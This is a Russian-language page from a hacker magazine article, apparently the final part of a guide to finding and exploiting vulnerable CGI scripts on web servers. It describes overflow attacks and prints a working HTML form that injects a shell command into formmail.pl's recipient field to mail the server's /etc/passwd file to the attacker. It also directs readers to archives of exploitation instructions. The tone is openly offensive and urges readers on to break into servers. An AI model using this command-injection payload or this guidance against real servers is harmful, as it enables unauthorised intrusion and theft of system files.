В ПОИСКАХ ВАКАНТНЫХ ДЫР...
Спецвыпуск Xakep, номер #022, стр. 022-028-5
Overflow. Скрипту передается заведомо большой запрос, что приводит к некорректной его обработке, и, как следствие, скрипт может не выполнить проверку на, скажем, передачу управления либо совершить непредусмотренные разработчиком действия. К скриптам такого рода относится, например, args.bat, прилагающийся к Website 1.x. Overflow - атака позволила в свое время взломать сервер ID Software.
Мэлеры. Путем передачи управления, скажем, тому же sendmail'y, реально получить по почте любой файл, на доступ к которому есть права у httpd. Скажем, если на www.host.com находится formmail, то, создав страницу со следующими полями:
<FORM Method="POST" Action="http://www.host.com/cgi-bin/formmail.pl">
<INPUT TYPE="hidden" NAME="recipient"VALUE="some@email.com; /bin/mail your@email.com < /etc/passwd">,
можно получить passwd к себе в мыльницу.
После того как ты нашел на серваке дырявый скрипт и уверен, что он там действительно лежит, беги скорее на www.void.ru и ищи там статью "CGI-ЖУКС: подробно и по-русски" - тут описания большинства дырявых скриптов и инструкция по использованию дырок в них ;). Или беги сюда: http://qwerty.nanko.ru - тут намного больший архив, но уже на ангельском ;(.
Ну, на этом, я думаю, мы закончим.
Если ты все понял, то у тебя скоро получится что-то типа этого:
Если появятся какие-то вопросы, сначала поищи ответы в Инете, а потом уже начинай бомбить мой несчастный мыл ;).
Назад на стр. 022-028-4 Содержание
|